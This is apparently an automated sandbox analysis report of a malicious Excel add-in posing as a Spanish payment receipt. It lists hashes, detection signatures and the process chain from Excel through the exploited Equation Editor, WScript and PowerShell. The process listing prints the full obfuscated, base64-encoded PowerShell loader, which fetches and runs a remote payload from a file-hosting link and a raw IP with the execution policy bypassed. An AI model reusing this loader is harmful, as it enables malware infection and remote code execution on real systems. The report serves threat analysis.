Edit tour
Windows
Analysis Report
Comprobante de pago.xlam.xlsx
Overview
General Information
| Sample name: | Comprobante de pago.xlam.xlsx |
| Analysis ID: | 1540839 |
| MD5: | 3739645f289889f9008d2607eb2558e1 |
| SHA1: | d32ffac570a059cc5582e7eb4668bb34c2b3fcc7 |
| SHA256: | c43a3a0ce7d7879849045e4ff17ff6f6d74a3462bd2da91e0f0284d3768a2b96 |
| Tags: | xlamxlsxuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell Download and Execute IEX
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3412 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
EQNEDT32.EXE (PID: 3620 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3756 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\wedne sdaystuff. vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3832 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' SWV4KCgoJ3 h5cGltYWdl VXJsID0gVF g2aHR0cHM6 Ly9kcml2ZS 5nb29nbGUu JysnY28nKy dtL3VjJysn P2V4cG9ydD 1kb3dubG8n KydhZCZpZD 0xLVdkZ2Vx MGZYOWFBcG RsU1c5ZGxu MVBjX0tFR3 BmSHAgVFg2 O3h5cHdlYk NsaWVudCA9 IE5ldy1PJy snYicrJ2pl YycrJ3QgU3 lzdGVtLk5l dC5XZWJDbG llbnQ7eHlw aW1hZ2VCeX RlcyA9IHh5 cHdlYkNsaW VudC5Eb3du bG9hZERhdG EoeHlwaW1h Z2VVcmwpO3 h5cGltYWdl VGV4dCA9IF tTeXN0ZW0u VGV4dC4nKy dFbmNvJysn ZGluZ106Ol VURjguR2V0 U3RyaW5nKH h5cGltYWdl QicrJ3l0ZX MpO3h5cHN0 YXJ0RmxhZy A9IFRYNjw8 JysnQkFTRT Y0X1NUQVJU Pj5UWCcrJz Y7eHlwZW5k RmxhZyA9IF RYNjw8Jysn QkFTRTY0X0 VORD4+VFg2 O3h5cHN0YX J0SScrJ25k ZXggPSB4eX BpbWFnZVRl eHQuSW5kZX gnKydPZih4 eXBzdGFydE YnKydsYWcp O3gnKyd5cG VuZEluZGV4 ID0geHlwaW 0nKydhZ2VU ZXh0LkluZG V4T2YoeHlw JysnZW5kRm xhZyk7eHlw c3RhcnRJbm RleCAtZ2Ug MCAtYW5kIH h5cGVuZElu ZGV4JysnIC 1ndCB4eXBz dGFydEluZG V4O3h5cHN0 YXJ0SW5kZX ggKz0gJysn eHlwc3Rhcn RGbGFnLkxl bmd0aDt4eX BiYXNlNjRM ZW5ndGggPS B4JysneXBl bmRJbmRleC AtIHh5cHN0 YXJ0SW5kZX g7eHlwYmFz ZTY0Q29tbW FuZCA9IHh5 cGltYWdlJy snVGV4dC5T dWJzdHJpbm coeHlwc3Rh cnRJbmRleC wgeHlwYmFz ZTY0TGUnKy duZ3RoKScr Jzt4eXBiYX NlNicrJzRS ZXZlcnNlZC A9IC1qb2lu ICh4eXBiYX NlNjRDb21t YW5kLlRvQ2 hhckEnKydy cmF5KCkgV1 ZvIEZvckVh Y2gtJysnT2 JqZWN0IHsg eHlwXyB9KV stMS4uLSh4 eXBiJysnYX NlNjRDb21t YW5kLkxlbm d0aCldO3h5 cGNvbW1hbm RCeXRlcycr JyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coeHlwYmFz ZTY0UmV2ZX JzZWQpO3h5 cGxvYWRlZE Fzc2VtYmx5 ID0gW1N5c3 RlbS5SZWZs ZWN0aW9uLk Fzc2VtYmx5 XTo6TG9hZC h4eXBjbycr J21tYW5kQn l0ZXMpO3h5 cHZhaU1ldG hvZCA9IFtk bmxpYi5JTy 5Ib21lXS5H ZScrJ3RNZX RobycrJ2Qo VFg2VkFJVF g2KTt4eXB2 YWlNZXRob2 QuSW52b2tl KHh5cG51bG wsIEAoVFg2 dHh0JysnLl lBRFNFVVQv MjQxLjYxMi 4zLjI5MS8v OnB0dGhUWD YsIFRYNmRl c2F0aXZhZG 9UWDYsIFRY NmRlc2F0aX ZhZG9UWDYs IFRYNmRlc2 F0aXZhZG9U WDYsIFRYNk FkZEluUHJv Y2VzczMyVF g2LCBUWDZk ZXNhdGl2YW RvVFg2LCcr JyBUWDZkZX NhdGl2YWRv VFg2LFRYNi crJ1RYNixU WDZUWDYsVF g2VFg2LFRY NlRYNixUWD ZUWDYsVFg2 MVRYNikpOy cpIC1DckVQ bEFDRSAnV1 ZvJyxbQ0hB Ul0xMjQgIC 1DckVQbEFD RSAgKFtDSE FSXTEyMCtb Q0hBUl0xMj ErW0NIQVJd MTEyKSxbQ0 hBUl0zNiAt Q3JFUGxBQ0 UoW0NIQVJd ODQrW0NIQV JdODgrW0NI QVJdNTQpLF tDSEFSXTM5 KSk=';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3932 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "Iex(( ('xypimage Url = TX6h ttps://dri ve.google. '+'co'+'m/ uc'+'?expo rt=downlo' +'ad&id=1- Wdgeq0fX9a ApdlSW9dln 1Pc_KEGpfH p TX6;xypw ebClient = New-O'+'b '+'jec'+'t System.Ne t.WebClien t;xypimage Bytes = xy pwebClient .DownloadD ata(xypima geUrl);xyp imageText = [System. Text.'+'En co'+'ding] ::UTF8.Get String(xyp imageB'+'y tes);xypst artFlag = TX6<<'+'BA SE64_START >>TX'+'6;x ypendFlag = TX6<<'+' BASE64_END >>TX6;xyps tartI'+'nd ex = xypim ageText.In dex'+'Of(x ypstartF'+ 'lag);x'+' ypendIndex = xypim'+ 'ageText.I ndexOf(xyp '+'endFlag );xypstart Index -ge 0 -and xyp endIndex'+ ' -gt xyps tartIndex; xypstartIn dex += '+' xypstartFl ag.Length; xypbase64L ength = x' +'ypendInd ex - xypst artIndex;x ypbase64Co mmand = xy pimage'+'T ext.Substr ing(xypsta rtIndex, x ypbase64Le '+'ngth)'+ ';xypbase6 '+'4Revers ed = -join (xypbase6 4Command.T oCharA'+'r ray() WVo ForEach-'+ 'Object { xyp_ })[-1 ..-(xypb'+ 'ase64Comm and.Length )];xypcomm andBytes'+ ' = [Syste m.Convert] ::FromBase 64String(x ypbase64Re versed);xy ploadedAss embly = [S ystem.Refl ection.Ass embly]::Lo ad(xypco'+ 'mmandByte s);xypvaiM ethod = [d nlib.IO.Ho me].Ge'+'t Metho'+'d( TX6VAITX6) ;xypvaiMet hod.Invoke (xypnull, @(TX6txt'+ '.YADSEUT/ 241.612.3. 291//:ptth TX6, TX6de sativadoTX 6, TX6desa tivadoTX6, TX6desati vadoTX6, T X6AddInPro cess32TX6, TX6desati vadoTX6,'+ ' TX6desat ivadoTX6,T X6'+'TX6,T X6TX6,TX6T X6,TX6TX6, TX6TX6,TX6 1TX6));') -CrEPlACE 'WVo',[CHA R]124 -CrE PlACE ([CH AR]120+[CH AR]121+[CH AR]112),[C HAR]36 -Cr EPlACE([CH AR]84+[CHA R]88+[CHAR ]54),[CHAR ]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Exploits |   |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||